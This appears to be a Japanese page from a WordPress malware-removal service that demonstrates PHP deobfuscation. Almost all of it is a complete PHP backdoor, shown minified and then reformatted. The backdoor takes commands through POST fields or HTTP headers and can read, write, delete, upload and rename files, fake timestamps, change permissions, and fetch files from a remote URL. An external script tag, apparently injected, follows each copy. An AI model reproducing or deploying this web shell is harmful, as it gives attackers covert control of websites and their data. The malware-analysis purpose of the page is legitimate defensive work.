Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php error_reporting(0);define("ROOT",$_SERVER["DOCUMENT_ROOT"]);$b=array();function fx($c){return function_exists($c);}function fg($c){return file_get_contents($c);}function fp($c,$e){return file_put_contents($c,$e)!==false;}function pwd(){if(fx("getcwd"))return@getcwd();else return@dirname(__FILE__);}function r2($g){if(is_dir($g)){$h=sCaNDir($g);foreach($h as $i){if($i=='.'||$i=='..')continue;$j=$g.'/'.$i;is_dir($j)?r2($j):uNliNk($j);}rMdIR($g);}else uNliNk($g);}function d($k,$m){if(fx('curl_init')){$o=curl_init($m);$q=fopen($k,'w+');curl_setopt($o,CURLOPT_FILE,$q);curl_setopt($o,CURLOPT_TIMEOUT,50);if(curl_exec($o)){curl_close($o);$i=1;}else{$i=fwrite($q,fg($m))?1:0;}fclose($q);}else{$i=@fp($k,fg($m))?1:0;}return $i;}function g($e){return!empty($_POST[$e])?$_POST[$e]:$_SERVER["HTTP_X_".strtoupper($e)];}$c=g("a");if(!empty($c)){$r=!empty($_POST['v'])?$_POST['v']:@$_SERVER["HTTP_X_CSRF_TOKEN"];if(!empty($r))$r=base64_decode(substr($r,1));$s=g("d");$u=array();$e=1;switch($c){case 1:$u=array("root"=>ROOT,"server"=>$_SERVER['SERVER_SOFTWARE'],"cip"=>$_SERVER['REMOTE_ADDR'],);if(fx("getcwd"))$u['pwd']=pwd();if(fx("ini_get"))$u["safe_mode"]=@ini_get("safe_mode");if(fx("phpversion"))$u["version"]=@phpversion();$u["sip"]=$_SERVER["SERVER_ADDR"];if(empty($u["sip"]))$u["sip"]=@gethostbyname($_SERVER["SERVER_NAME"]);break;case 2:if(empty($r))$r=pwd();$w=scandir($r);$x=array();$y=array();foreach($w as $z){if($z=="."||$z=="..")continue;$g=$r."/".$z;$aa=array("n"=>$z,"p"=>substr(sprintf('%o',fILepErMs($g)),-4),"t"=>date('Y-m-d H:i:s',fILeMTiMe($g)),);if(is_dir($g))$x[]=$aa;else{$aa['s']=filesize($g);$y[]=$aa;}}$u["d"]=$x;$u["f"]=$y;break;case 3:r2($r);break;case 4:$u["v"]=fg($r);break;case 5:if(!is_writable($s))@chmod($r,0644);$e=fp($s,$r)?1:0;break;case 6:$k=$s.g("n");$bb=$s.$r;$cc=@FiLemTiME($k);if(!@ReNamE($k,$bb))$e=0;elseif($cc)@touCH($bb,$cc,$cc);break;case 7:if(!@chmod($s,$r))$e=0;break;case 8:$e=move_uploaded_file($_FILES["f"]['tmp_name'],$r)?1:0;break;case 9:$e=fp($r,"")?1:0;break;case 10:$e=mkdir($r)?1:0;break;case 11:$m=g("l");$e=d($r,$m)?1:0;break;}$b['data']=$u;$b['code']=$e;header('Content-type: application/json; charset=utf-8');register_shutdown_function(function(){global $b;ob_end_clean();echo json_encode($b);});return;}?>
<script type="module" src="https://cdn.jsdelivr.net/gh/oiklqa/a/1.js"></script><?php
error_reporting(0);
define("ROOT", $_SERVER["DOCUMENT_ROOT"]);
$b = array();
function fx($c)
{
return function_exists($c);
}
function fg($c)
{
return file_get_contents($c);
}
function fp($c, $e)
{
return file_put_contents($c, $e) !== false;
}
function pwd()
{
if (fx("getcwd")) {
return @getcwd();
} else {
return @"/var/www/html";
}
}
function r2($g)
{
if (is_dir($g)) {
$h = sCaNDir($g);
foreach ($h as $i) {
if ($i == '.' || $i == '..') {
continue;
}
$j = $g . '/' . $i;
is_dir($j) ? r2($j) : uNliNk($j);
}
rMdIR($g);
} else {
uNliNk($g);
}
}
function d($k, $m)
{
if (fx('curl_init')) {
$o = curl_init($m);
$q = fopen($k, 'w+');
curl_setopt($o, CURLOPT_FILE, $q);
curl_setopt($o, CURLOPT_TIMEOUT, 50);
if (curl_exec($o)) {
curl_close($o);
$i = 1;
} else {
$i = fwrite($q, fg($m)) ? 1 : 0;
}
fclose($q);
} else {
$i = @fp($k, fg($m)) ? 1 : 0;
}
return $i;
}
function g($e)
{
return !empty($_POST[$e]) ? $_POST[$e] : $_SERVER["HTTP_X_" . strtoupper($e)];
}
$c = g("a");
if (!empty($c)) {
$r = !empty($_POST['v']) ? $_POST['v'] : @$_SERVER["HTTP_X_CSRF_TOKEN"];
if (!empty($r)) {
$r = base64_decode(substr($r, 1));
}
$s = g("d");
$u = array();
$e = 1;
switch ($c) {
case 1:
$u = array("root" => ROOT, "server" => $_SERVER['SERVER_SOFTWARE'], "cip" => $_SERVER['REMOTE_ADDR']);
if (fx("getcwd")) {
$u['pwd'] = pwd();
}
if (fx("ini_get")) {
$u["safe_mode"] = @ini_get("safe_mode");
}
if (fx("phpversion")) {
$u["version"] = @phpversion();
}
$u["sip"] = $_SERVER["SERVER_ADDR"];
if (empty($u["sip"])) {
$u["sip"] = @gethostbyname($_SERVER["SERVER_NAME"]);
}
break;
case 2:
if (empty($r)) {
$r = pwd();
}
$w = scandir($r);
$x = array();
$y = array();
foreach ($w as $z) {
if ($z == "." || $z == "..") {
continue;
}
$g = $r . "/" . $z;
$aa = array("n" => $z, "p" => substr(sprintf('%o', fILepErMs($g)), 4), "t" => date('Y-m-d H:i:s', fILeMTiMe($g)));
if (is_dir($g)) {
$x[] = $aa;
} else {
$aa['s'] = filesize($g);
$y[] = $aa;
}
}
$u["d"] = $x;
$u["f"] = $y;
break;
case 3:
r2($r);
break;
case 4:
$u["v"] = fg($r);
break;
case 5:
if (!is_writable($s)) {
@chmod($r, 0644);
}
$e = fp($s, $r) ? 1 : 0;
break;
case 6:
$k = $s . g("n");
$bb = $s . $r;
$cc = @FiLemTiME($k);
if (!@ReNamE($k, $bb)) {
$e = 0;
} elseif ($cc) {
@touCH($bb, $cc, $cc);
}
break;
case 7:
if (!@chmod($s, $r)) {
$e = 0;
}
break;
case 8:
$e = move_uploaded_file($_FILES["f"]['tmp_name'], $r) ? 1 : 0;
break;
case 9:
$e = fp($r, "") ? 1 : 0;
break;
case 10:
$e = mkdir($r) ? 1 : 0;
break;
case 11:
$m = g("l");
$e = d($r, $m) ? 1 : 0;
break;
}
$b['data'] = $u;
$b['code'] = $e;
header('Content-type: application/json; charset=utf-8');
register_shutdown_function(function () {
global $b;
ob_end_clean();
echo json_encode($b);
});
return;
}
?>
<script type="module" src="https://cdn.jsdelivr.net/gh/oiklqa/a/1.js"></script>■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.